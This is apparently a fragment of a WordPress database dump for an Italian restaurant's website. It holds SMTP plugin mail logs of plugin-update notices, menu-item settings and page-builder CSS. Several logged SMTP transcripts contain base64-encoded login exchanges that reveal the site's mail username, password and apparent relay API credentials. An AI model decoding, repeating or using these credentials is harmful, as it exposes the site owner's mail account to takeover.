<notifiche@ristorantesolymar.it>'),(37739,3706,'to_header','webmaster@baldisserri.com'),(37740,3706,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37741,3706,'original_to','webmaster@baldisserri.com'),(37742,3706,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37743,3706,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WP Mail SMTP Plugin by Mail Bank (from version 4.0.12 to 4.0.13)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37744,3706,'original_headers',''),(37745,3706,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 09 Jan 2021 07:24:05 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <5eb0617cda44409f1531018def638fc7@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Sat, 09 Jan 2021 12:24:05 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- WP M=\r\nail SMTP Plugin by Mail Bank (from version 4.0.12 to 4.0.13)=0A=0A=0AIf=\r\n you experience any issues or need support, the volunteers in the WordPr=\r\ness.org support forums may be able to help.=0Ahttps://wordpress.org/supp=\r\nort/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kyDHp-00058N-Q7\r\n'),(37746,3707,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37747,3707,'success',''),(37748,3707,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37749,3707,'to_header','webmaster@baldisserri.com'),(37750,3707,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37751,3707,'original_to','webmaster@baldisserri.com'),(37752,3707,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37753,3707,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL (from version 4.0.5 to 4.0.6)\n- Yoast SEO (from version 15.5 to 15.6)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37754,3707,'original_headers',''),(37755,3707,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 12 Jan 2021 07:23:36 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37756,3708,'solution','Not found, check status column for more info.'),(37757,3708,'success','1'),(37758,3708,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37759,3708,'to_header','webmaster@baldisserri.com'),(37760,3708,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37761,3708,'original_to','webmaster@baldisserri.com'),(37762,3708,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37763,3708,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL (from version 4.0.5 to 4.0.6)\n- Yoast SEO (from version 15.5 to 15.6)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37764,3708,'original_headers',''),(37765,3708,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 12 Jan 2021 07:23:38 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <d7b7505a8bf01d7c8b4a0b620e7c6265@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Tue, 12 Jan 2021 12:23:38 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Real=\r\nly Simple SSL (from version 4.0.5 to 4.0.6)=0A- Yoast SEO (from version=\r\n 15.5 to 15.6)=0A=0A=0AIf you experience any issues or need support, the=\r\n volunteers in the WordPress.org support forums may be able to help.=0Ah=\r\nttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kzIi2-0005vS-VA\r\n'),(37766,3709,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37767,3709,'success',''),(37768,3709,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37769,3709,'to_header','webmaster@baldisserri.com'),(37770,3709,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37771,3709,'original_to','webmaster@baldisserri.com'),(37772,3709,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37773,3709,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO (from version 15.6 to 15.6.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37774,3709,'original_headers',''),(37775,3709,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 12 Jan 2021 19:22:57 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37776,3710,'solution','Not found, check status column for more info.'),(37777,3710,'success','1'),(37778,3710,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37779,3710,'to_header','webmaster@baldisserri.com'),(37780,3710,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37781,3710,'original_to','webmaster@baldisserri.com'),(37782,3710,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37783,3710,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO (from version 15.6 to 15.6.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37784,3710,'original_headers',''),(37785,3710,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 12 Jan 2021 19:22:59 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <d3ee09ea5cc5899bd3468e33dcbc6633@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Wed, 13 Jan 2021 00:22:59 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Yoas=\r\nt SEO (from version 15.6 to 15.6.2)=0A=0A=0AIf you experience any issues=\r\n or need support, the volunteers in the WordPress.org support forums may=\r\n be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordP=\r\nress Team\r\n.\r\n250 OK id=1kzTwB-0004su-N0\r\n'),(37786,3711,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37787,3711,'success',''),(37788,3711,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37789,3711,'to_header','webmaster@baldisserri.com'),(37790,3711,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37791,3711,'original_to','webmaster@baldisserri.com'),(37792,3711,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37793,3711,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from version 3.1.1 to 3.1.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37794,3711,'original_headers',''),(37795,3711,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 14 Jan 2021 07:22:32 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37796,3712,'solution','Not found, check status column for more info.'),(37797,3712,'success','1'),(37798,3712,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37799,3712,'to_header','webmaster@baldisserri.com'),(37800,3712,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37801,3712,'original_to','webmaster@baldisserri.com'),(37802,3712,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37803,3712,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from version 3.1.1 to 3.1.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37804,3712,'original_headers',''),(37805,3712,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 14 Jan 2021 07:22:34 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <ed1ba5de69faab962f0ad7228c7ae36c@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Thu, 14 Jan 2021 12:22:34 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- News=\r\nletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from ve=\r\nrsion 3.1.1 to 3.1.2)=0A=0A=0AIf you experience any issues or need suppo=\r\nrt, the volunteers in the WordPress.org support forums may be able to he=\r\nlp.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1l01e6-0004ZK-LX\r\n'),(38444,3755,'_menu_item_object_id','3755'),(38445,3755,'_menu_item_object','custom'),(38446,3755,'_menu_item_target',''),(38447,3755,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38448,3755,'_menu_item_xfn',''),(38449,3755,'_menu_item_url','#'),(38450,3755,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38451,3755,'_menu_item_icon','null'),(38452,3756,'_menu_item_type','custom'),(38453,3756,'_menu_item_menu_item_parent','3733'),(38454,3756,'_menu_item_object_id','3756'),(38455,3756,'_menu_item_object','custom'),(38456,3756,'_menu_item_target',''),(38457,3756,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38458,3756,'_menu_item_xfn',''),(38459,3756,'_menu_item_url','#'),(38460,3756,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38461,3756,'_menu_item_icon','null'),(38462,3757,'_menu_item_type','custom'),(38463,3757,'_menu_item_menu_item_parent','3733'),(38464,3757,'_menu_item_object_id','3757'),(38465,3757,'_menu_item_object','custom'),(38466,3757,'_menu_item_target',''),(38467,3757,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38468,3757,'_menu_item_xfn',''),(38469,3757,'_menu_item_url','#'),(38470,3757,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38471,3757,'_menu_item_icon','null'),(38472,3758,'_menu_item_type','custom'),(38473,3758,'_menu_item_menu_item_parent','3733'),(38474,3758,'_menu_item_object_id','3758'),(38475,3758,'_menu_item_object','custom'),(38476,3758,'_menu_item_target',''),(38477,3758,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38478,3758,'_menu_item_xfn',''),(38479,3758,'_menu_item_url','#'),(38480,3758,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38481,3758,'_menu_item_icon','null'),(38482,3759,'_menu_item_type','custom'),(38483,3759,'_menu_item_menu_item_parent','3726'),(38484,3759,'_menu_item_object_id','3759'),(38485,3759,'_menu_item_object','custom'),(38486,3759,'_menu_item_target',''),(38487,3759,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38488,3759,'_menu_item_xfn',''),(38489,3759,'_menu_item_url','#'),(38490,3759,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38491,3759,'_menu_item_icon','null'),(38492,3760,'_menu_item_type','custom'),(38493,3760,'_menu_item_menu_item_parent','3732'),(38494,3760,'_menu_item_object_id','3760'),(38495,3760,'_menu_item_object','custom'),(38496,3760,'_menu_item_target',''),(38497,3760,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38498,3760,'_menu_item_xfn',''),(38499,3760,'_menu_item_url','#'),(38500,3760,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38501,3760,'_menu_item_icon','null'),(38502,3761,'_menu_item_type','custom'),(38503,3761,'_menu_item_menu_item_parent','3724'),(38504,3761,'_menu_item_object_id','3761'),(38505,3761,'_menu_item_object','custom'),(38506,3761,'_menu_item_target',''),(38507,3761,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38508,3761,'_menu_item_xfn',''),(38509,3761,'_menu_item_url','#'),(38510,3761,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38511,3761,'_menu_item_icon','null'),(38512,3762,'_menu_item_type','custom'),(38513,3762,'_menu_item_menu_item_parent','3730'),(38514,3762,'_menu_item_object_id','3762'),(38515,3762,'_menu_item_object','custom'),(38516,3762,'_menu_item_target',''),(38517,3762,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38518,3762,'_menu_item_xfn',''),(38519,3762,'_menu_item_url','#'),(38520,3762,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38521,3762,'_menu_item_icon','null'),(38522,3763,'_menu_item_type','custom'),(38523,3763,'_menu_item_menu_item_parent','3726'),(38524,3763,'_menu_item_object_id','3763'),(38525,3763,'_menu_item_object','custom'),(38526,3763,'_menu_item_target',''),(38527,3763,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38528,3763,'_menu_item_xfn',''),(38529,3763,'_menu_item_url','#'),(38530,3763,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38531,3763,'_menu_item_icon','null'),(38532,3764,'_menu_item_type','custom'),(38533,3764,'_menu_item_menu_item_parent','3726'),(38534,3764,'_menu_item_object_id','3764'),(38535,3764,'_menu_item_object','custom'),(38536,3764,'_menu_item_target',''),(38537,3764,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38538,3764,'_menu_item_xfn',''),(38539,3764,'_menu_item_url','#'),(38540,3764,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38541,3764,'_menu_item_icon','null'),(38542,3765,'_menu_item_type','custom'),(38543,3765,'_menu_item_menu_item_parent','0'),(38544,3765,'_menu_item_object_id','3765'),(38545,3765,'_menu_item_object','custom'),(38546,3765,'_menu_item_target',''),(38547,3765,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38548,3765,'_menu_item_xfn',''),(38549,3765,'_menu_item_url','#'),(38550,3765,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38551,3766,'_menu_item_type','custom'),(38552,3766,'_menu_item_menu_item_parent','3730'),(38553,3766,'_menu_item_object_id','3766'),(38554,3766,'_menu_item_object','custom'),(38555,3766,'_menu_item_target',''),(38556,3766,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38557,3766,'_menu_item_xfn',''),(38558,3766,'_menu_item_url','#'),(38559,3766,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38560,3766,'_menu_item_icon','null'),(38561,3767,'_menu_item_type','custom'),(38562,3767,'_menu_item_menu_item_parent','3730'),(38563,3767,'_menu_item_object_id','3767'),(38564,3767,'_menu_item_object','custom'),(38565,3767,'_menu_item_target',''),(38566,3767,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38567,3767,'_menu_item_xfn',''),(38568,3767,'_menu_item_url','#'),(38569,3767,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38570,3767,'_menu_item_icon','null'),(38571,2,'_wp_page_template','default'),(38572,3,'_wp_page_template','default'),(38573,3034,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38574,3034,'_wp_page_template','default'),(38575,3034,'slide_template','default'),(38576,3034,'_wpb_vc_js_status','false'),(38577,3034,'mkdf_page_content_behind_header_meta','no'),(38578,3034,'mkdf_disable_vertical_header_background_image_meta','no'),(38579,3034,'mkdf_disable_header_widget_areas_meta','no'),(38580,3034,'mkdf_title_area_type_meta','attika'),(38581,3034,'mkdf_header_type_meta','header-divided'),(38582,3034,'mkdf_header_behaviour_meta','no-behavior'),(38583,3034,'mkdf_menu_area_background_color_meta','#ffffff'),(38584,3034,'mkdf_sidebar_layout_meta','sidebar-25-right'),(38585,3034,'mkdf_custom_sidebar_area_meta','shop-sidebar'),(38586,3034,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(38587,3034,'mkdf_page_content_padding','70px 0 100px'),(38588,3035,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38589,3035,'_wp_page_template','default'),(38590,3035,'slide_template','default'),(38591,3035,'_wpb_vc_js_status','false'),(38592,3035,'mkdf_page_content_behind_header_meta','no'),(38593,3035,'mkdf_disable_vertical_header_background_image_meta','no'),(38594,3035,'mkdf_disable_header_widget_areas_meta','no'),(38595,3035,'mkdf_title_area_type_meta','attika'),(38596,3035,'mkdf_page_content_padding','100px 0'),(38597,3035,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(38598,3035,'mkdf_menu_area_background_color_meta','#ffffff'),(38599,3036,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38600,3036,'_wp_page_template','default'),(38601,3036,'slide_template','default'),(38602,3036,'_wpb_vc_js_status','false'),(38603,3036,'mkdf_page_content_behind_header_meta','no'),(38604,3036,'mkdf_disable_vertical_header_background_image_meta','no'),(38605,3036,'mkdf_disable_header_widget_areas_meta','no'),(38606,3036,'mkdf_title_area_type_meta','attika'),(38607,3036,'mkdf_menu_area_background_color_meta','#ffffff'),(38608,3036,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(38609,3036,'mkdf_page_content_padding','85px 0 30px'),(38610,3037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38611,3037,'_wp_page_template','default'),(38612,3037,'slide_template','default'),(38613,3037,'_wpb_vc_js_status','false'),(38614,3037,'mkdf_page_content_behind_header_meta','no'),(38615,3037,'mkdf_disable_vertical_header_background_image_meta','no'),(38616,3037,'mkdf_disable_header_widget_areas_meta','no'),(38617,3037,'mkdf_title_area_type_meta','attika'),(38618,3037,'mkdf_menu_area_background_color_meta','#ffffff'),(38619,3037,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(38620,3037,'mkdf_page_content_padding','120px 0px 86px 0px'),(38621,3038,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38622,3038,'_wp_page_template','full-width.php'),(38623,3038,'slide_template','default'),(38624,3038,'_wpb_vc_js_status','true'),(38625,3038,'mkdf_page_content_behind_header_meta','no'),(38626,3038,'mkdf_disable_vertical_header_background_image_meta','no'),(38627,3038,'mkdf_disable_header_widget_areas_meta','no'),(38628,3038,'mkdf_page_content_padding','80px 0 110px'),(38629,3039,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38630,3039,'_wp_page_template','full-width.php'),(38631,3039,'slide_template','default'),(38632,3039,'_wpb_vc_js_status','false'),(38633,3039,'mkdf_page_content_behind_header_meta','no'),(38634,3039,'mkdf_disable_vertical_header_background_image_meta','no'),(38635,3039,'mkdf_disable_header_widget_areas_meta','no'),(44566,3974,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(38637,3040,'_wp_page_template','full-width.php'),(38638,3040,'slide_template','default'),(38639,3040,'_wpb_vc_js_status','true'),(38640,3040,'mkdf_page_content_behind_header_meta','no'),(38641,3040,'mkdf_page_content_padding','100px 0 0 0'),(38642,3040,'mkdf_page_content_padding_mobile','100px 0 0 0'),(38643,3040,'mkdf_header_type_meta','header-divided'),(38644,3040,'mkdf_disable_vertical_header_background_image_meta','no'),(38645,3040,'mkdf_disable_header_widget_areas_meta','no'),(38646,3040,'mkdf_show_title_area_meta','no'),(38647,3040,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}'),(44573,3059,'_edit_lock','1611422997:1'),(58608,4624,'solution','All good, mail sent.'),(44575,3059,'_edit_last','1'),(44576,3059,'rs_page_bg_color','#ffffff'),(44571,3976,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    